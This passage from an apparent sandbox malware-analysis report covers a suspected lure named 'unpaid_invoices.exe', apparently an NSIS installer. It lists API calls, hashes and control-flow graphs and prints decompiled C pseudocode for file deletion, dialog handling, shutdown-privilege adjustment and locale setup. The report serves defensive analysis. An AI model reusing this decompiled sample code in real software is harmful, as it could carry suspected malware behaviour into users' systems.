                • Part of subcall function 00405C1C: CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22
              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A89
              • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\unpaid_invoices.exe" ,00000000,?), ref: 00403A95
              • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AB5
              • DeleteFileW.KERNEL32(0079F748,0079F748,?,007A9000,?), ref: 00403B14
              • CopyFileW.KERNEL32(C:\Users\user\Desktop\unpaid_invoices.exe,0079F748,00000001), ref: 00403B27
              • CloseHandle.KERNEL32(00000000,0079F748,0079F748,?,0079F748,00000000), ref: 00403B54
              • ExitProcess.KERNEL32(?), ref: 00403B72
              • OleUninitialize.OLE32(?), ref: 00403B77
              • ExitProcess.KERNEL32 ref: 00403B91
              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BA5
              • OpenProcessToken.ADVAPI32(00000000), ref: 00403BAC
              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BC0
              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BDF
              • ExitWindowsEx.USER32 ref: 00403C04
              • ExitProcess.KERNEL32 ref: 00403C25
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
              • String ID: "C:\Users\user\Desktop\unpaid_invoices.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\unpaid_invoices.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
              • API String ID: 2292928366-757432626
              • Opcode ID: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
              • Instruction ID: 9002a92140da6a8b371a97510ecbbb4cdf1836846ed801e4a5207059f252ac0c
              • Opcode Fuzzy Hash: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
              • Instruction Fuzzy Hash: EAE13571A00214AAD720AFB58D45BAF7EB9EB45709F10843EF541B62D1DB7C8E41CB2D
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 390 405d7a-405da0 call 406045 393 405da2-405db4 DeleteFileW 390->393 394 405db9-405dc0 390->394 395 405f36-405f3a 393->395 396 405dc2-405dc4 394->396 397 405dd3-405de3 call 40666e 394->397 399 405ee4-405ee9 396->399 400 405dca-405dcd 396->400 403 405df2-405df3 call 405f89 397->403 404 405de5-405df0 lstrcatW 397->404 399->395 402 405eeb-405eee 399->402 400->397 400->399 405 405ef0-405ef6 402->405 406 405ef8-405f00 call 4069a4 402->406 407 405df8-405dfc 403->407 404->407 405->395 406->395 414 405f02-405f16 call 405f3d call 405d32 406->414 410 405e08-405e0e lstrcatW 407->410 411 405dfe-405e06 407->411 413 405e13-405e2f lstrlenW FindFirstFileW 410->413 411->410 411->413 415 405e35-405e3d 413->415 416 405ed9-405edd 413->416 432 405f18-405f1b 414->432 433 405f2e-405f31 call 4056d0 414->433 419 405e5d-405e71 call 40666e 415->419 420 405e3f-405e47 415->420 416->399 418 405edf 416->418 418->399 430 405e73-405e7b 419->430 431 405e88-405e93 call 405d32 419->431 422 405e49-405e51 420->422 423 405ebc-405ecc FindNextFileW 420->423 422->419 427 405e53-405e5b 422->427 423->415 426 405ed2-405ed3 FindClose 423->426 426->416 427->419 427->423 430->423 435 405e7d-405e86 call 405d7a 430->435 443 405eb4-405eb7 call 4056d0 431->443 444 405e95-405e98 431->444 432->405 434 405f1d-405f2c call 4056d0 call 40642e 432->434 433->395 434->395 435->423 443->423 446 405e9a-405eaa call 4056d0 call 40642e 444->446 447 405eac-405eb2 444->447 446->423 447->423
              C-Code - Quality: 98%
              			E00405D7A(void* __eflags, signed int _a4, signed int _a8) {
              				signed int _v8;
              				signed int _v12;
              				short _v556;
              				short _v558;
              				struct _WIN32_FIND_DATAW _v604;
              				signed int _t38;
              				signed int _t52;
              				signed int _t55;
              				signed int _t62;
              				void* _t64;
              				signed char _t65;
              				WCHAR* _t66;
              				void* _t67;
              				WCHAR* _t68;
              				void* _t70;
              
              				_t65 = _a8;
              				_t68 = _a4;
              				_v8 = _t65 & 0x00000004;
              				_t38 = E00406045(__eflags, _t68);
              				_v12 = _t38;
              				if((_t65 & 0x00000008) != 0) {
              					_t62 = DeleteFileW(_t68); // executed
              					asm("sbb eax, eax");
              					_t64 =  ~_t62 + 1;
              					 *0x7a8b28 =  *0x7a8b28 + _t64;
              					return _t64;
              				}
              				_a4 = _t65;
              				_t8 =  &_a4;
              				 *_t8 = _a4 & 0x00000001;
              				__eflags =  *_t8;
              				if( *_t8 == 0) {
              					L5:
              					E0040666E(0x7a3f90, _t68);
              					__eflags = _a4;
              					if(_a4 == 0) {
              						E00405F89(_t68);
              					} else {
              						lstrcatW(0x7a3f90, L"\\*.*");
              					}
              					__eflags =  *_t68;
              					if( *_t68 != 0) {
              						L10:
              						lstrcatW(_t68, 0x40a014);
              						L11:
              						_t66 =  &(_t68[lstrlenW(_t68)]);
              						_t38 = FindFirstFileW(0x7a3f90,  &_v604); // executed
              						_t70 = _t38;
              						__eflags = _t70 - 0xffffffff;
              						if(_t70 == 0xffffffff) {
              							L26:
              							__eflags = _a4;
              							if(_a4 != 0) {
              								_t30 = _t66 - 2;
              								 *_t30 =  *(_t66 - 2) & 0x00000000;
              								__eflags =  *_t30;
              							}
              							goto L28;
              						} else {
              							goto L12;
              						}
              						do {
              							L12:
              							__eflags = _v604.cFileName - 0x2e;
              							if(_v604.cFileName != 0x2e) {
              								L16:
              								E0040666E(_t66,  &(_v604.cFileName));
              								__eflags = _v604.dwFileAttributes & 0x00000010;
              								if(__eflags == 0) {
              									_t52 = E00405D32(__eflags, _t68, _v8);
              									__eflags = _t52;
              									if(_t52 != 0) {
              										E004056D0(0xfffffff2, _t68);
              									} else {
              										__eflags = _v8 - _t52;
              										if(_v8 == _t52) {
              											 *0x7a8b28 =  *0x7a8b28 + 1;
              										} else {
              											E004056D0(0xfffffff1, _t68);
              											E0040642E(_t67, _t68, 0);
              										}
              									}
              								} else {
              									__eflags = (_a8 & 0x00000003) - 3;
              									if(__eflags == 0) {
              										E00405D7A(__eflags, _t68, _a8);
              									}
              								}
              								goto L24;
              							}
              							__eflags = _v558;
              							if(_v558 == 0) {
              								goto L24;
              							}
              							__eflags = _v558 - 0x2e;
              							if(_v558 != 0x2e) {
              								goto L16;
              							}
              							__eflags = _v556;
              							if(_v556 == 0) {
              								goto L24;
              							}
              							goto L16;
              							L24:
              							_t55 = FindNextFileW(_t70,  &_v604); // executed
              							__eflags = _t55;
              						} while (_t55 != 0);
              						_t38 = FindClose(_t70); // executed
              						goto L26;
              					}
              					__eflags =  *0x7a3f90 - 0x5c;
              					if( *0x7a3f90 != 0x5c) {
              						goto L11;
              					}
              					goto L10;
              				} else {
              					__eflags = _t38;
              					if(_t38 == 0) {
              						L28:
              						__eflags = _a4;
              						if(_a4 == 0) {
              							L36:
              							return _t38;
              						}
              						__eflags = _v12;
              						if(_v12 != 0) {
              							_t38 = E004069A4(_t68);
              							__eflags = _t38;
              							if(_t38 == 0) {
              								goto L36;
              							}
              							E00405F3D(_t68);
              							_t38 = E00405D32(__eflags, _t68, _v8 | 0x00000001);
              							__eflags = _t38;
              							if(_t38 != 0) {
              								return E004056D0(0xffffffe5, _t68);
              							}
              							__eflags = _v8;
              							if(_v8 == 0) {
              								goto L30;
              							}
              							E004056D0(0xfffffff1, _t68);
              							return E0040642E(_t67, _t68, 0);
              						}
              						L30:
              						 *0x7a8b28 =  *0x7a8b28 + 1;
              						return _t38;
              					}
              					__eflags = _t65 & 0x00000002;
              					if((_t65 & 0x00000002) == 0) {
              						goto L28;
              					}
              					goto L5;
              				}
              			}



















              APIs
              • DeleteFileW.KERNELBASE(?,?,76CDFAA0,76CDF560,00000000), ref: 00405DA3
              • lstrcatW.KERNEL32(007A3F90,\*.*), ref: 00405DEB
              • lstrcatW.KERNEL32(?,0040A014), ref: 00405E0E
              • lstrlenW.KERNEL32(?,?,0040A014,?,007A3F90,?,?,76CDFAA0,76CDF560,00000000), ref: 00405E14
              • FindFirstFileW.KERNELBASE(007A3F90,?,?,?,0040A014,?,007A3F90,?,?,76CDFAA0,76CDF560,00000000), ref: 00405E24
              • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405EC4
              • FindClose.KERNELBASE(00000000), ref: 00405ED3
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
              • String ID: .$.$\*.*
              • API String ID: 2035342205-3749113046
              • Opcode ID: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
              • Instruction ID: b1f38bcf7b39c15e0faf9db06640fc0f7a2e3671fe4bba31c24ee78ec55d2bca
              • Opcode Fuzzy Hash: 2c15840b85a1da03f103e354df9429e37a0661891549dd982a13389e768be2bb
              • Instruction Fuzzy Hash: 5541E230800A15AADB21AB61CC49ABF7678DF42714F20813FF845B11D1EB7C4E91DEAE
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004069A4(WCHAR* _a4) {
              				void* _t2;
              
              				_t2 = FindFirstFileW(_a4, 0x7a4fd8); // executed
              				if(_t2 == 0xffffffff) {
              					return 0;
              				}
              				FindClose(_t2);
              				return 0x7a4fd8;
              			}





              APIs
              • FindFirstFileW.KERNELBASE(76CDFAA0,007A4FD8,007A4790,0040608E,007A4790,007A4790,00000000,007A4790,007A4790,76CDFAA0,?,76CDF560,00405D9A,?,76CDFAA0,76CDF560), ref: 004069AF
              • FindClose.KERNEL32(00000000), ref: 004069BB
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: Find$CloseFileFirst
              • String ID:
              • API String ID: 2295610775-0
              • Opcode ID: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
              • Instruction ID: 60c22f5c8fe31c667ed350a31965a044de81702d272a45ebe5fc25ec47674b4c
              • Opcode Fuzzy Hash: 721887c06873c2ed1700ed969bf0ce4ded3b87a21ff0d7dab6a5e84a2f4fc02f
              • Instruction Fuzzy Hash: 47D012F15191205FCB4017786E0C84B7A589F573313264B36B0A6F55E0D6748C3787AC
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 141 4040cb-4040dd 142 4040e3-4040e9 141->142 143 404244-404253 141->143 142->143 144 4040ef-4040f8 142->144 145 4042a2-4042b7 143->145 146 404255-404290 GetDlgItem * 2 call 4045ca KiUserCallbackDispatcher call 40140b 143->146 150 4040fa-404107 SetWindowPos 144->150 151 40410d-404114 144->151 148 4042f7-4042fc call 404616 145->148 149 4042b9-4042bc 145->149 167 404295-40429d 146->167 163 404301-40431c 148->163 153 4042be-4042c9 call 401389 149->153 154 4042ef-4042f1 149->154 150->151 156 404116-404130 ShowWindow 151->156 157 404158-40415e 151->157 153->154 180 4042cb-4042ea SendMessageW 153->180 154->148 162 404597 154->162 164 404231-40423f call 404631 156->164 165 404136-404149 GetWindowLongW 156->165 159 404160-404172 DestroyWindow 157->159 160 404177-40417a 157->160 168 404574-40457a 159->168 170 40417c-404188 SetWindowLongW 160->170 171 40418d-404193 160->171 169 404599-4045a0 162->169 174 404325-40432b 163->174 175 40431e-404320 call 40140b 163->175 164->169 165->164 166 40414f-404152 ShowWindow 165->166 166->157 167->145 168->162 176 40457c-404582 168->176 170->169 171->164 179 404199-4041a8 GetDlgItem 171->179 177 404331-40433c 174->177 178 404555-40456e DestroyWindow EndDialog 174->178 175->174 176->162 183 404584-40458d ShowWindow 176->183 177->178 184 404342-40438f call 4066ab call 4045ca * 3 GetDlgItem 177->184 178->168 185 4041c7-4041ca 179->185 186 4041aa-4041c1 SendMessageW IsWindowEnabled 179->186 180->169 183->162 213 404391-404396 184->213 214 404399-4043d5 ShowWindow EnableWindow call 4045ec EnableWindow 184->214 188 4041cc-4041cd 185->188 189 4041cf-4041d2 185->189 186->162 186->185 191 4041fd-404202 call 4045a3 188->191 192 4041e0-4041e5 189->192 193 4041d4-4041da 189->193 191->164 196 40421b-40422b SendMessageW 192->196 198 4041e7-4041ed 192->198 193->196 197 4041dc-4041de 193->197 196->164 197->191 201 404204-40420d call 40140b 198->201 202 4041ef-4041f5 call 40140b 198->202 201->164 211 40420f-404219 201->211 
209 4041fb 202->209 209->191 211->209 213->214 217 4043d7-4043d8 214->217 218 4043da 214->218 219 4043dc-40440a GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 40440c-40441d SendMessageW 219->220 221 40441f 219->221 222 404425-404464 call 4045ff call 4040ac call 40666e lstrlenW call 4066ab SetWindowTextW call 401389 220->222 221->222 222->163 233 40446a-40446c 222->233 233->163 234 404472-404476 233->234 235 404495-4044a9 DestroyWindow 234->235 236 404478-40447e 234->236 235->168 238 4044af-4044dc CreateDialogParamW 235->238 236->162 237 404484-40448a 236->237 237->163 239 404490 237->239 238->168 240 4044e2-404539 call 4045ca GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->162 240->162 245 40453b-404553 ShowWindow call 404616 240->245 245->168
              C-Code - Quality: 84%
              			E004040CB(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
              				struct HWND__* _v28;
              				void* _v84;
              				void* _v88;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				signed int _t34;
              				signed int _t36;
              				signed int _t38;
              				struct HWND__* _t48;
              				signed int _t67;
              				struct HWND__* _t73;
              				signed int _t86;
              				struct HWND__* _t91;
              				signed int _t99;
              				int _t103;
              				signed int _t117;
              				int _t118;
              				int _t122;
              				signed int _t124;
              				struct HWND__* _t127;
              				struct HWND__* _t128;
              				int _t129;
              				intOrPtr _t130;
              				long _t133;
              				int _t135;
              				int _t136;
              				void* _t137;
              
              				_t130 = _a8;
              				if(_t130 == 0x110 || _t130 == 0x408) {
              					_t34 = _a12;
              					_t127 = _a4;
              					__eflags = _t130 - 0x110;
              					 *0x7a1f70 = _t34;
              					if(_t130 == 0x110) {
              						 *0x7a8aa8 = _t127;
              						 *0x7a1f84 = GetDlgItem(_t127, 1);
              						_t91 = GetDlgItem(_t127, 2);
              						_push(0xffffffff);
              						_push(0x1c);
              						 *0x79ff50 = _t91;
              						E004045CA(_t127);
              						SetClassLongW(_t127, 0xfffffff2,  *0x7a7a88); // executed
              						 *0x7a7a6c = E0040140B(4);
              						_t34 = 1;
              						__eflags = 1;
              						 *0x7a1f70 = 1;
              					}
              					_t124 =  *0x40a39c; // 0x0
              					_t136 = 0;
              					_t133 = (_t124 << 6) +  *0x7a8ac0;
              					__eflags = _t124;
              					if(_t124 < 0) {
              						L36:
              						E00404616(0x40b);
              						while(1) {
              							_t36 =  *0x7a1f70;
              							 *0x40a39c =  *0x40a39c + _t36;
              							_t133 = _t133 + (_t36 << 6);
              							_t38 =  *0x40a39c; // 0x0
              							__eflags = _t38 -  *0x7a8ac4;
              							if(_t38 ==  *0x7a8ac4) {
              								E0040140B(1);
              							}
              							__eflags =  *0x7a7a6c - _t136;
              							if( *0x7a7a6c != _t136) {
              								break;
              							}
              							__eflags =  *0x40a39c -  *0x7a8ac4; // 0x0
              							if(__eflags >= 0) {
              								break;
              							}
              							_t117 =  *(_t133 + 0x14);
              							E004066AB(_t117, _t127, _t133, 0x7b8000,  *((intOrPtr*)(_t133 + 0x24)));
              							_push( *((intOrPtr*)(_t133 + 0x20)));
              							_push(0xfffffc19);
              							E004045CA(_t127);
              							_push( *((intOrPtr*)(_t133 + 0x1c)));
              							_push(0xfffffc1b);
              							E004045CA(_t127);
              							_push( *((intOrPtr*)(_t133 + 0x28)));
              							_push(0xfffffc1a);
              							E004045CA(_t127);
              							_t48 = GetDlgItem(_t127, 3);
              							__eflags =  *0x7a8b2c - _t136;
              							_v28 = _t48;
              							if( *0x7a8b2c != _t136) {
              								_t117 = _t117 & 0x0000fefd | 0x00000004;
              								__eflags = _t117;
              							}
              							ShowWindow(_t48, _t117 & 0x00000008);
              							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
              							E004045EC(_t117 & 0x00000002);
              							_t118 = _t117 & 0x00000004;
              							EnableWindow( *0x79ff50, _t118);
              							__eflags = _t118 - _t136;
              							if(_t118 == _t136) {
              								_push(1);
              							} else {
              								_push(_t136);
              							}
              							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
              							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
              							__eflags =  *0x7a8b2c - _t136;
              							if( *0x7a8b2c == _t136) {
              								_push( *0x7a1f84);
              							} else {
              								SendMessageW(_t127, 0x401, 2, _t136);
              								_push( *0x79ff50);
              							}
              							E004045FF();
              							E0040666E(0x7a1f88, E004040AC());
              							E004066AB(0x7a1f88, _t127, _t133,  &(0x7a1f88[lstrlenW(0x7a1f88)]),  *((intOrPtr*)(_t133 + 0x18)));
              							SetWindowTextW(_t127, 0x7a1f88);
              							_push(_t136);
              							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
              							__eflags = _t67;
              							if(_t67 != 0) {
              								continue;
              							} else {
              								__eflags =  *_t133 - _t136;
              								if( *_t133 == _t136) {
              									continue;
              								}
              								__eflags =  *(_t133 + 4) - 5;
              								if( *(_t133 + 4) != 5) {
              									DestroyWindow( *0x7a7a78);
              									 *0x7a0f60 = _t133;
              									__eflags =  *_t133 - _t136;
              									if( *_t133 <= _t136) {
              										goto L60;
              									}
              									_t73 = CreateDialogParamW( *0x7a8aa0,  *_t133 +  *0x7a7a80 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
              									__eflags = _t73 - _t136;
              									 *0x7a7a78 = _t73;
              									if(_t73 == _t136) {
              										goto L60;
              									}
              									_push( *((intOrPtr*)(_t133 + 0x2c)));
              									_push(6);
              									E004045CA(_t73);
              									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
              									ScreenToClient(_t127, _t137 + 0x10);
              									SetWindowPos( *0x7a7a78, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
              									_push(_t136);
              									E00401389( *((intOrPtr*)(_t133 + 0xc)));
              									__eflags =  *0x7a7a6c - _t136;
              									if( *0x7a7a6c != _t136) {
              										goto L63;
              									}
              									ShowWindow( *0x7a7a78, 8);
              									E00404616(0x405);
              									goto L60;
              								}
              								__eflags =  *0x7a8b2c - _t136;
              								if( *0x7a8b2c != _t136) {
              									goto L63;
              								}
              								__eflags =  *0x7a8b20 - _t136;
              								if( *0x7a8b20 != _t136) {
              									continue;
              								}
              								goto L63;
              							}
              						}
              						DestroyWindow( *0x7a7a78); // executed
              						 *0x7a8aa8 = _t136;
              						EndDialog(_t127,  *0x7a0758); // executed
              						goto L60;
              					} else {
              						__eflags = _t34 - 1;
              						if(_t34 != 1) {
              							L35:
              							__eflags =  *_t133 - _t136;
              							if( *_t133 == _t136) {
              								goto L63;
              							}
              							goto L36;
              						}
              						_push(0);
              						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
              						__eflags = _t86;
              						if(_t86 == 0) {
              							goto L35;
              						}
              						SendMessageW( *0x7a7a78, 0x40f, 0, 1);
              						__eflags =  *0x7a7a6c;
              						return 0 |  *0x7a7a6c == 0x00000000;
              					}
              				} else {
              					_t127 = _a4;
              					_t136 = 0;
              					if(_t130 == 0x47) {
              						SetWindowPos( *0x7a1f68, _t127, 0, 0, 0, 0, 0x13);
              					}
              					_t122 = _a12;
              					if(_t130 != 5) {
              						L8:
              						if(_t130 != 0x40d) {
              							__eflags = _t130 - 0x11;
              							if(_t130 != 0x11) {
              								__eflags = _t130 - 0x111;
              								if(_t130 != 0x111) {
              									goto L28;
              								}
              								_t135 = _t122 & 0x0000ffff;
              								_t128 = GetDlgItem(_t127, _t135);
              								__eflags = _t128 - _t136;
              								if(_t128 == _t136) {
              									L15:
              									__eflags = _t135 - 1;
              									if(_t135 != 1) {
              										__eflags = _t135 - 3;
              										if(_t135 != 3) {
              											_t129 = 2;
              											__eflags = _t135 - _t129;
              											if(_t135 != _t129) {
              												L27:
              												SendMessageW( *0x7a7a78, 0x111, _t122, _a16);
              												goto L28;
              											}
              											__eflags =  *0x7a8b2c - _t136;
              											if( *0x7a8b2c == _t136) {
              												_t99 = E0040140B(3);
              												__eflags = _t99;
              												if(_t99 != 0) {
              													goto L28;
              												}
              												 *0x7a0758 = 1;
              												L23:
              												_push(0x78);
              												L24:
              												E004045A3();
              												goto L28;
              											}
              											E0040140B(_t129);
              											 *0x7a0758 = _t129;
              											goto L23;
              										}
              										__eflags =  *0x40a39c - _t136; // 0x0
              										if(__eflags <= 0) {
              											goto L27;
              										}
              										_push(0xffffffff);
              										goto L24;
              									}
              									_push(_t135);
              									goto L24;
              								}
              								SendMessageW(_t128, 0xf3, _t136, _t136);
              								_t103 = IsWindowEnabled(_t128);
              								__eflags = _t103;
              								if(_t103 == 0) {
              									L63:
              									return 0;
              								}
              								goto L15;
              							}
              							SetWindowLongW(_t127, _t136, _t136);
              							return 1;
              						}
              						DestroyWindow( *0x7a7a78);
              						 *0x7a7a78 = _t122;
              						L60:
              						if( *0x7a3f88 == _t136 &&  *0x7a7a78 != _t136) {
              							ShowWindow(_t127, 0xa);
              							 *0x7a3f88 = 1;
              						}
              						goto L63;
              					} else {
              						asm("sbb eax, eax");
              						ShowWindow( *0x7a1f68,  ~(_t122 - 1) & 0x00000005);
              						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
              							L28:
              							return E00404631(_a8, _t122, _a16);
              						} else {
              							ShowWindow(_t127, 4);
              							goto L8;
              						}
              					}
              				}
              			}































              0x004041a4
              0x004041a6
              0x004041a8
              0x004041c7
              0x004041c7
              0x004041ca
              0x004041cf
              0x004041d2
              0x004041e2
              0x004041e3
              0x004041e5
              0x0040421b
              0x0040422b
              0x00000000
              0x0040422b
              0x004041e7
              0x004041ed
              0x00404206
              0x0040420b
              0x0040420d
              0x00000000
              0x00000000
              0x0040420f
              0x004041fb
              0x004041fb
              0x004041fd
              0x004041fd
              0x00000000
              0x004041fd
              0x004041f0
              0x004041f5
              0x00000000
              0x004041f5
              0x004041d4
              0x004041da
              0x00000000
              0x00000000
              0x004041dc
              0x00000000
              0x004041dc
              0x004041cc
              0x00000000
              0x004041cc
              0x004041b2
              0x004041b9
              0x004041bf
              0x004041c1
              0x00404597
              0x00000000
              0x00404597
              0x00000000
              0x004041c1
              0x0040417f
              0x00000000
              0x00404187
              0x00404166
              0x0040416c
              0x00404574
              0x0040457a
              0x00404587
              0x0040458d
              0x0040458d
              0x00000000
              0x00404116
              0x0040411b
              0x00404127
              0x00404130
              0x00404231
              0x00000000
              0x0040414f
              0x00404152
              0x00000000
              0x00404152
              0x00404130
              0x00404114

              APIs
              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404107
              • ShowWindow.USER32(?), ref: 00404127
              • GetWindowLongW.USER32(?,000000F0), ref: 00404139
              • ShowWindow.USER32(?,00000004), ref: 00404152
              • DestroyWindow.USER32 ref: 00404166
              • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040417F
              • GetDlgItem.USER32 ref: 0040419E
              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041B2
              • IsWindowEnabled.USER32(00000000), ref: 004041B9
              • GetDlgItem.USER32 ref: 00404264
              • GetDlgItem.USER32 ref: 0040426E
              • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404288
              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D9
              • GetDlgItem.USER32 ref: 0040437F
              • ShowWindow.USER32(00000000,?), ref: 004043A0
              • EnableWindow.USER32(?,?), ref: 004043B2
              • EnableWindow.USER32(?,?), ref: 004043CD
              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043E3
              • EnableMenuItem.USER32 ref: 004043EA
              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404402
              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404415
              • lstrlenW.KERNEL32(007A1F88,?,007A1F88,00000000), ref: 0040443F
              • SetWindowTextW.USER32(?,007A1F88), ref: 00404453
              • ShowWindow.USER32(?,0000000A), ref: 00404587
              Memory Dump Source
              • Source File: 00000000.00000002.248548385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_unpaid_invoices.jbxd
              Similarity
              • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
              • String ID:
              • API String ID: 2475350683-0
              • Opcode ID: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
              • Instruction ID: f65a6081c11fa3fb00f54a078e57315272211b1d7c342d1bec1514082707246b
              • Opcode Fuzzy Hash: c3199f5d2ce6d65744aaa9316b253cb325a561f7dca841ae501f2507a703712f
              • Instruction Fuzzy Hash: 63C1ADB1500204BFDB216F65EE49E2A3AA8EBC6745F00853EF741B55E0CB3D5851DB2E
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              control_flow_graph 248 403d1d-403d35 call 406a3b 251 403d37-403d42 GetUserDefaultUILanguage call 4065b5 248->251 252 403d49-403d80 call 40653c 248->252 255 403d47 251->255 258 403d82-403d93 call 40653c 252->258 259 403d98-403d9e lstrcatW 252->259 257 403da3-403dcc call 403ff3 call 406045 255->257 265 403dd2-403dd7 257->265 266 403e5e-403e66 call 406045 257->266 258->259 259->257 265->266 267 403ddd-403e05 call 40653c 265->267 272 403e74-403e99 LoadImageW 266->272 273 403e68-403e6f call 4066ab 266->273 267->266 274 403e07-403e0b 267->274 276 403f1a-403f22 call 40140b 272->276 277 403e9b-403ecb RegisterClassW 272->277 273->272 278 403e1d-403e29 lstrlenW 274->278 279 403e0d-403e1a call 405f6a 274->279 290 403f24-403f27 276->290 291 403f2c-403f37 call 403ff3 276->291 280 403ed1-403f15 SystemParametersInfoW CreateWindowExW 277->280 281 403fe9 277->281 285 403e51-403e59 call 405f3d call 40666e 278->285 286 403e2b-403e39 lstrcmpiW 278->286 279->278 280->276 284 403feb-403ff2 281->284 285->266 286->285 289 403e3b-403e45 GetFileAttributesW 286->289 294 403e47-403e49 289->294 295 403e4b-403e4c call 405f89 289->295 290->284 300 403fc0-403fc8 call 4057a3 291->300 301 403f3d-403f57 ShowWindow call 4069cb 291->301 294->285 294->295 295->285 306 403fe2-403fe4 call 40140b 300->306 307 403fca-403fd0 300->307 308 403f63-403f75 GetClassInfoW 301->308 309 403f59-403f5e call 4069cb 301->309 306->281 307->290 310 403fd6-403fdd call 40140b 307->310 313 403f77-403f87 GetClassInfoW RegisterClassW 308->313 314 403f8d-403fb0 DialogBoxParamW call 40140b 308->314 309->308 310->290 313->314 318 403fb5-403fbe call 403c6d 314->318 318->284
              C-Code - Quality: 96%
              			E00403D1D(void* __eflags) {
              				intOrPtr _v4;
              				intOrPtr _v8;
              				int _v12;
              				void _v16;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				intOrPtr* _t22;
              				void* _t30;
              				void* _t32;
              				int _t33;
              				void* _t36;
              				int _t39;
              				int _t40;
              				int _t44;
              				short _t63;
              				WCHAR* _t65;
              				signed char _t69;
              				signed short _t73;
              				WCHAR* _t76;
              				intOrPtr _t82;
              				WCHAR* _t87;
              
              				_t82 =  *0x7a8ab0;
              				_t22 = E00406A3B(2);
              				_t90 = _t22;
              				if(_t22 == 0) {
              					_t76 = 0x7a1f88;
              					L"1033" = 0x30;
              					 *0x7b5002 = 0x78;
              					 *0x7b5004 = 0;
              					E0040653C(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x7a1f88, 0);
              					__eflags =  *0x7a1f88;
              					if(__eflags == 0) {
              						E0040653C(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x7a1f88, 0);
              					}
              					lstrcatW(L"1033", _t76);
